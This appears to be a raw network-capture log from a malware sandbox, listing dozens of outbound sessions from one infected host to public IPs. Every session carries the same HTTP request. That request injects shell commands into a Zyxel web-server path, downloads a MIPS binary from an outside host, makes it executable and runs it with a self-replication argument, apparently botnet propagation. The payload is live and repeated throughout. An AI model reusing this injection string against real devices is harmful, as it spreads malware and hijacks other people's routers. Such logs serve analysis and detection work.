                                      Jan 14, 2024 15:50:53.466275930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6159192.168.2.143978885.228.25.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466293097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6160192.168.2.143665853.121.112.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466351032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6161192.168.2.1436842133.69.32.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466375113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6162192.168.2.1433272194.64.242.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466424942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6163192.168.2.145187837.196.41.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466458082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6164192.168.2.1453324132.6.235.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466501951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6165192.168.2.1440704172.123.113.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466551065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6166192.168.2.1448000176.142.44.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466590881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6167192.168.2.145689085.103.248.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466617107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6168192.168.2.145438487.159.107.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466654062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6169192.168.2.1444078107.253.101.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466708899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6170192.168.2.146081487.170.208.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466748953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6171192.168.2.1447222187.177.137.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466805935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6172192.168.2.1443920166.50.59.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466839075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6173192.168.2.1436422209.121.1.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466867924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6174192.168.2.1449134219.241.155.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466898918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6175192.168.2.1445278105.184.225.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466943979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6176192.168.2.145874632.220.157.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466990948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6177192.168.2.144298032.68.155.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467006922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6178192.168.2.1436366139.121.180.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467063904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6179192.168.2.145605040.110.218.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467096090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6180192.168.2.1439382105.41.136.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467132092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6181192.168.2.143863466.226.126.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467181921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6182192.168.2.1455240117.70.146.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467212915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6183192.168.2.144076482.235.16.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467255116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6184192.168.2.143725418.158.137.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467276096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6185192.168.2.144709069.172.36.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467308044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6186192.168.2.1439840124.212.81.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467328072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6187192.168.2.144916820.186.9.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467372894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6188192.168.2.144741495.76.177.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467401981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6189192.168.2.144663227.137.187.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467434883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6190192.168.2.143479080.243.106.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467477083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6191192.168.2.1458018198.4.67.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467526913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192192.168.2.1438862151.106.23.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467571974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6193192.168.2.14444664.243.82.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467595100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6194192.168.2.1458674129.80.36.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467623949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6195192.168.2.1438254210.246.125.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467654943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6196192.168.2.1435206197.43.124.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467715025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6197192.168.2.1438076162.69.246.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467749119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6198192.168.2.14523185.61.44.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467781067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6199192.168.2.1442654209.9.211.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467813969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6200192.168.2.1452012150.206.118.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467865944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6201192.168.2.1433068206.151.69.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467911005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6202192.168.2.143492025.225.67.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467958927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6203192.168.2.1450670193.205.100.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.467983961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6204192.168.2.1446494121.220.38.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468045950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6205192.168.2.1438304201.252.189.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468075991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6206192.168.2.1433216154.237.168.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468133926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6207192.168.2.1439414163.244.255.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468159914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6208192.168.2.1444510143.103.86.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468200922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6209192.168.2.1440168192.133.184.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468255043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6210192.168.2.143304486.137.240.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468287945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6211192.168.2.144308259.149.164.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468334913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6212192.168.2.1452810222.213.97.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468364954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6213192.168.2.1452740188.70.127.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468416929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6214192.168.2.1445162190.191.120.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468445063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6215192.168.2.145106863.2.69.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468494892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6216192.168.2.1442522100.140.110.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468527079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6217192.168.2.145263670.138.193.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468585968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6218192.168.2.1459292118.113.244.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468617916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6219192.168.2.143429474.189.227.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468658924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6220192.168.2.143285662.40.152.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468720913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6221192.168.2.144246886.65.34.125443
                                      TimestampBytes transferredDirectionData
